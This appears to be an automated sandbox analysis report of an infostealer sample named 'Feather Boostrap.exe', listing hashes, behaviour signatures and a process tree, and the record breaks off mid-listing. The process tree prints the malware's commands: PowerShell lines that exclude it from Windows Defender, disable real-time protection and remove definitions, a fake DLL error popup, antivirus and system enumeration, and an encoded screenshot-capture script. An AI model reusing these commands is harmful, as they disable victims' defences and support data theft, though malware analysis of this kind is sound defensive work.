Analysis

  • max time kernel
    181s
  • max time network
    180s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    31-12-2024 22:51

General

  • Target

    Feather Boostrap.exe

  • Size

    7.6MB

  • MD5

    348dbc907eb4d0123302bd6e1adab458

  • SHA1

    0f2ccd3ff897b75f2b62e79d468dbac2acb48ba7

  • SHA256

    b67a2978d34f7b191836f5c18c128d41374fc73767624c7170b9561c1276676a

  • SHA512

    6d15374e0a7d2c56284af70b59f04ec2e4a399f79838bf2cb566c72f61e4022f12a01821262cb1110423d8b051d1fcad5245ba9b20785d26538b8ae2d4105c7f

  • SSDEEP

    196608:OTc1dEjPwfI9jUCnORird1KfbLOYgN2oc+nBIdAxI:V8EIHOQ76bynnBI9

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Clipboard Data 1 TTPs 4 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 35 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 8 IoCs
  • UPX packed file 64 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Detects videocard installed 1 TTPs 4 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Gathers system information 1 TTPs 2 IoCs

    Runs systeminfo.exe.

  • Kills process with taskkill 1 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 30 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 47 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Feather Boostrap.exe
    "C:\Users\Admin\AppData\Local\Temp\Feather Boostrap.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1352
    • C:\Users\Admin\AppData\Local\Temp\Feather Boostrap.exe
      "C:\Users\Admin\AppData\Local\Temp\Feather Boostrap.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1208
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Feather Boostrap.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1380
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Feather Boostrap.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4540
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2968
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4404
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('missing : advapi32.dll', 0, 'ERROR 0x3453', 32+16);close()""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:836
        • C:\Windows\system32\mshta.exe
          mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('missing : advapi32.dll', 0, 'ERROR 0x3453', 32+16);close()"
          4⤵
            PID:1924
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2688
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:1284
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1752
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic csproduct get uuid
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3856
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2028
          • C:\Windows\system32\reg.exe
            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
            4⤵
              PID:4560
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4344
            • C:\Windows\system32\reg.exe
              REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              4⤵
                PID:3296
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:664
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic path win32_VideoController get name
                4⤵
                • Detects videocard installed
                • Suspicious use of AdjustPrivilegeToken
                PID:1604
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:448
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic path win32_VideoController get name
                4⤵
                • Detects videocard installed
                PID:4296
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:3172
              • C:\Windows\system32\tasklist.exe
                tasklist /FO LIST
                4⤵
                • Enumerates processes with tasklist
                PID:4720
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1808
              • C:\Windows\system32\tasklist.exe
                tasklist /FO LIST
                4⤵
                • Enumerates processes with tasklist
                PID:432
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:4480
              • C:\Windows\System32\Wbem\WMIC.exe
                WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                4⤵
                  PID:1908
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                3⤵
                • Clipboard Data
                • Suspicious use of WriteProcessMemory
                PID:2768
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell Get-Clipboard
                  4⤵
                  • Clipboard Data
                  • Suspicious behavior: EnumeratesProcesses
                  PID:1892
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:2508
                • C:\Windows\system32\tasklist.exe
                  tasklist /FO LIST
                  4⤵
                  • Enumerates processes with tasklist
                  PID:3480
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tree /A /F"
                3⤵
                  PID:1540
                  • C:\Windows\system32\tree.com
                    tree /A /F
                    4⤵
                      PID:3676
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "systeminfo"
                    3⤵
                      PID:4184
                      • C:\Windows\system32\systeminfo.exe
                        systeminfo
                        4⤵
                        • Gathers system information
                        PID:1888
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                      3⤵
                        PID:4864
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                          4⤵
                          • Suspicious behavior: EnumeratesProcesses
                          PID:2024
                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ertj5rzq\ertj5rzq.cmdline"
                            5⤵
                              PID:752
                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8E26.tmp" "c:\Users\Admin\AppData\Local\Temp\ertj5rzq\CSC813B1229123047C58D78AF7FBADE641C.TMP"
                                6⤵
                                  PID:3592
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                            3⤵
                              PID:2020
                              • C:\Windows\system32\tree.com
                                tree /A /F
                                4⤵
                                  PID:4812
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe"
                            1⤵
                            • Enumerates system info in registry
                            • Modifies data under HKEY_USERS
                            • Modifies registry class
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                            • Suspicious use of FindShellTrayWindow
                            • Suspicious use of SendNotifyMessage
                            PID:2072
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffc0ea1cc40,0x7ffc0ea1cc4c,0x7ffc0ea1cc58
                              2⤵
                                PID:1564
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1808,i,11625076633458694311,4519464288868990007,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1792 /prefetch:2
                                2⤵
                                  PID:3324
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2152,i,11625076633458694311,4519464288868990007,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2204 /prefetch:3
                                  2⤵
                                    PID:4804
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2320,i,11625076633458694311,4519464288868990007,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2272 /prefetch:8
                                    2⤵
                                      PID:2168
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3136,i,11625076633458694311,4519464288868990007,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3164 /prefetch:1
                                      2⤵
                                        PID:1320
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3172,i,11625076633458694311,4519464288868990007,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3188 /prefetch:1
                                        2⤵
                                          PID:2392
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3148,i,11625076633458694311,4519464288868990007,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3788 /prefetch:1
                                          2⤵
                                            PID:4388
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4708,i,11625076633458694311,4519464288868990007,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4880 /prefetch:8
                                            2⤵
                                              PID:4808
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4744,i,11625076633458694311,4519464288868990007,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4876 /prefetch:8
                                              2⤵
                                                PID:1780
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4852,i,11625076633458694311,4519464288868990007,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5076 /prefetch:8
                                                2⤵
                                                  PID:4176
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5276,i,11625076633458694311,4519464288868990007,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4712 /prefetch:8
                                                  2⤵
                                                    PID:2312
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
